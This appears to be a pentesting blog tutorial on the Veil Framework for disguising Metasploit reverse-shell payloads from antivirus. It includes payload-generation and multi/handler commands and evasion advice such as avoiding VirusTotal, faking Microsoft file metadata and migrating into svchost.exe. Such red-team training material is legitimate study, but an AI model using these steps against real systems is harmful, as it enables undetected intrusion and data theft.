Veil Framework Antivirus Evasion: A Pentester's Guide
The Veil Framework is a powerful collection of tools designed to generate Metasploit payloads that bypass common antivirus (AV) solutions by using various obfuscation, encryption, and language-wrapping techniques. It functions by taking standard shellcode and re-packaging it into different programming languages like Python, C, or Go, effectively changing the file's signature so it remains undetected by traditional scanning engines. For security professionals, mastering Veil is essential for simulating realistic threats where off-the-shelf malware would be instantly neutralized.
TL;DR
- Veil Framework automates the creation of undetected payloads to bypass signature-based antivirus detection.
- The framework consists of two primary tools: Veil-Evasion for payload generation and Veil-Ordnance for shellcode creation.
- Successful evasion relies on using non-standard languages (like AutoIt or Go) and avoiding public scanning services like VirusTotal.
- Integrating Veil with tools like Metasploit or Armitage Kali Linux streamlines the post-exploitation workflow.
Understanding the Veil Framework Architecture
The effectiveness of the Veil Framework stems from its modular architecture. Unlike simple encoders that only rearrange shellcode, Veil changes the entire context in which the malicious code executes. When you generate a payload, Veil doesn't just scramble the bytes; it writes a new source code file in a language of your choice, embeds the shellcode within it, and then compiles it into an executable. This process bypasses the static signatures that AV engines use to identify known malicious patterns.
Veil-Evasion vs. Veil-Ordnance
The framework is split into two distinct modules, each serving a specific purpose in the exploitation lifecycle. Veil-Evasion is the component most pentesters use daily. It contains the logic for taking shellcode and wrapping it in "stubs" written in Python, Ruby, C, PowerShell, and more. It currently supports over 40 different payload types, each with varying degrees of success against modern defensive suites.
Veil-Ordnance, on the other hand, is a tool for generating the raw shellcode itself. While Metasploit’s msfvenom is the industry standard for shellcode, Ordnance provides a fast, internal alternative within the Veil ecosystem. It allows you to quickly generate reverse TCP, HTTP, or HTTPS shellcode strings that are immediately ready for use in the Evasion module. By keeping these processes linked, Veil reduces the friction of switching between multiple terminal windows during a time-sensitive engagement.
Key Takeaway: Veil’s power lies in its ability to wrap known malicious shellcode in benign-looking source code, forcing antivirus software to rely on heuristic analysis rather than simple signature matching.
Installing Veil on Kali Linux: A Step-by-Step Guide
Installing Veil can be a complex process because it relies on Wine to compile Windows executables on a Linux environment. Many dependencies, including Python for Windows, Ruby, and various .NET frameworks, must be installed within the Wine prefix for the compilation to succeed. If any of these steps fail, the payloads will not compile correctly, or worse, they will crash on the target system.
To begin, update your Kali Linux repositories and clone the official repository from GitHub. Use the following commands to start the installation:
sudo apt update sudo git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent
The --force and --silent flags help automate the process, but you should still monitor the output. The setup script will download several hundred megabytes of data. During this phase, several Windows-style installers will pop up via Wine. It is vital to accept the default settings for these installers to ensure Veil knows exactly where the compilers are located. Once finished, you can launch the framework by typing ./Veil.py from the root directory.
If you encounter errors related to missing DLLs or Python headers, it usually indicates a corrupted Wine prefix. In such cases, deleting the ~/.wine directory and rerunning the setup script is often the fastest fix. For those performing initial reconnaissance before delivery, using an online port scanner can help identify which services are running on the target, which might influence the type of payload you choose to generate.
Generating Undetected Payloads for Antivirus Evasion
Once Veil is running, the workflow is straightforward but requires attention to detail. You first enter the Evasion menu by typing use 1. From there, you can list all available payloads using the list command. You will see categories like autoit, c, go, powershell, python, and ruby.
Selecting the Right Payload Template
For most OSCP candidates and red teamers, the python/meterpreter/rev_tcp or c/meterpreter/rev_tcp payloads are the most common choices. Python payloads are often effective because they are compiled into a standalone EXE using PyInstaller, which includes a full Python interpreter. This adds significant "noise" to the file, often masking the shellcode from simple scanners.
To use a specific payload, enter its number or full name. For example:
use python/meterpreter/rev_tcp
After selecting the payload, you must configure the options, specifically the LHOST (your IP) and LPORT (your listening port). You can also set the PROCESSORS option to specify how many cores the payload should use during its obfuscation routine, though the default is usually sufficient. Once configured, type generate. Veil will ask for a name for your executable and then proceed to build it. The final output is typically stored in /var/lib/veil/output/compiled/.
The Role of Obfuscation and Encryption
Veil doesn't just wrap the code; it often uses PyCrypto or other libraries to encrypt the shellcode within the executable. When the EXE runs on the victim's machine, it decrypts the shellcode in memory and executes it. This "in-memory" execution is a core concept in modern Meterpreter commands and post-exploitation strategies. Because the malicious code never touches the disk in its raw form, many older AV solutions fail to flag it.
Key Takeaway: Always use a unique name for your payload and consider using the 'Go' or 'AutoIt' templates, as these are less frequently analyzed by AV vendors compared to Python or PowerShell.
Advanced Evasion Techniques: Beyond the Basics
While Veil is excellent for bypassing static signatures, modern Endpoint Detection and Response (EDR) systems use behavioral analysis. They look for suspicious actions, such as a process suddenly making a network connection or injecting code into explorer.exe. To counter this, Veil users must think about the delivery and execution context.
Bypassing Heuristic Analysis
Heuristic engines look for patterns of execution. If an executable immediately tries to connect to a remote IP on port 4444, it triggers an alert. To mitigate this, you can modify the Veil source code templates before compilation. Adding "junk code"—benign loops, math calculations, or file read/write operations—can delay the execution of the shellcode and make the binary appear more like a legitimate application.
Another technique is to use a network scanner to identify common ports that are likely allowed through the firewall, such as 80, 443, or 53. If you configure your Veil payload to use these ports, the traffic is more likely to blend in with standard web browsing. Tools like a network scanner are invaluable here for mapping out the target's network architecture before generating your final payload.
The Danger of VirusTotal
One of the biggest mistakes a pentester can make is uploading a freshly generated Veil payload to VirusTotal. VirusTotal shares every uploaded file with AV vendors. Within hours, your "undetected" payload will have a signature, and it will be blocked by every major security suite. If you must test your payload, use services like KleenScan or AntiScan.me, which promise not to distribute the samples to security companies. Alternatively, set up a local lab with the target AV installed and test offline.
Integration with Metasploit and Post-Exploitation
Generating the payload is only half the battle. You need a way to catch the connection once the victim executes the file. Since Veil is designed to work with Metasploit, setting up a handler is the logical next step. You can use the multi/handler module in Metasploit to listen for the incoming connection.
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [Your IP] set LPORT [Your Port] exploit -j
Once the session is established, you can move into more advanced phases of the attack. If you are targeting older systems, you might look into mastering Windows 7 privilege escalation to gain SYSTEM-level access. From there, the full suite of post-exploitation tools becomes available, allowing for credential harvesting, lateral movement, and data exfiltration.
In environments with heavy monitoring, you should be aware of Intrusion Detection Systems (IDS). A properly configured Snort IDS installation can flag the cleartext traffic of a standard Meterpreter shell. To avoid this, always use encrypted payloads like reverse_https or reverse_tcp_rc4, which Veil supports natively.
Comparison of Popular Evasion Tools
Veil is not the only tool in the evasion space. Depending on the target environment, other tools might be more appropriate. Below is a comparison of Veil against MSFVenom and Shellter.
| Feature | MSFVenom | Veil Framework | Shellter |
|---|---|---|---|
| Primary Method | Encoding (Shikata Ga Nai) | Source Code Wrapping | Dynamic Injection |
| Ease of Use | High | Medium | Medium |
| AV Bypass Rate | Low (Most signatures known) | High (Modular templates) | Very High (Custom PE injection) |
| Target Platforms | All | Primarily Windows | Windows (x86) |
| Detection Type | Signature-based | Signature & Heuristic | Behavioral |
While MSFVenom is great for quick internal labs, it rarely bypasses modern Windows Defender. Shellter is fantastic for injecting shellcode into existing legitimate binaries (like vlc.exe), but it is limited to 32-bit applications in its community version. Veil remains the "middle ground" king, providing high customization and a wide array of language options that keep defenders guessing.
Maintaining Persistence and Avoiding Detection
After successfully using a Veil payload to gain an initial foothold, your priority shifts to persistence. A common mistake is leaving the Veil-generated EXE running as a standalone process. This is easy for a sysadmin to spot in Task Manager. Instead, use Meterpreter to migrate your process into a legitimate Windows service or a common process like svchost.exe.
You should also consider the "time to live" for your payload. Antivirus signatures are updated multiple times a day. A payload that works at 9:00 AM might be flagged by 5:00 PM if the AV vendor's cloud heuristics identify the suspicious behavior. For long-term engagements, use Veil to drop a more sophisticated, custom-coded backdoor that uses domain fronting or other advanced communication methods.
Furthermore, pay attention to the file's metadata. Veil allows you to change the icon and the file version information of the generated EXE. A file named update.exe with a Microsoft Corporation digital signature (even if self-signed or faked) is much less likely to be scrutinized than payload.exe with no metadata. These small details are what separate a successful red team engagement from an early detection.
FAQ: Frequently Asked Questions about Veil
Is Veil Framework still effective against Windows Defender in 2024?
Yes, but it requires more effort than in previous years. Using the default Python templates often gets flagged by AMSI (Antimalware Scan Interface). To succeed, you should use less common languages like Go or AutoIt and manually obfuscate the resulting source code before allowing Veil to compile it.
How do I fix "Wine is not installed" errors in Veil?
This is a common issue on 64-bit Kali systems. You must enable the i386 architecture and install Wine32. Run dpkg --add-architecture i386 followed by apt update and apt install wine32. This allows Veil's Windows-based compilers to run correctly.
Can Veil generate Linux payloads?
While Veil focuses primarily on Windows executables (EXE and DLL), it does have templates for Python and Ruby that can run on Linux. However, since Linux AV is less common and works differently, most pentesters use standard MSFVenom or custom ELF binaries for Linux targets.
Why is my Veil payload file size so large?
This usually happens with Python-based payloads. Because Veil uses PyInstaller to bundle the Python interpreter and necessary DLLs into a single file, the resulting EXE can be 5MB to 10MB. C-based payloads are much smaller, often under 100KB, but they are sometimes easier for AV to analyze.
Final Strategy for Red Teamers
The Veil Framework remains a staple in the toolkit of any serious penetration tester. Its ability to quickly iterate through different languages and encryption schemes makes it invaluable for bypassing the first line of defense in most corporate environments. However, it is not a "silver bullet." As defensive technology evolves toward machine learning and EDR, your success will depend on your ability to customize Veil’s output and combine it with sophisticated delivery methods.
Always remember to test your payloads in a controlled environment and stay updated with the latest releases from the Veil-Framework GitHub. By understanding the underlying mechanics of how AV evasion works, you can adapt your techniques to stay one step ahead of the blue team. Whether you are preparing for the OSCP or conducting a high-stakes red team engagement, the Veil Framework provides the flexibility and power needed to gain that critical first shell.
For more advanced exploitation techniques and guides, explore our other resources on Metasploit, post-exploitation, and vulnerability research to round out your technical expertise.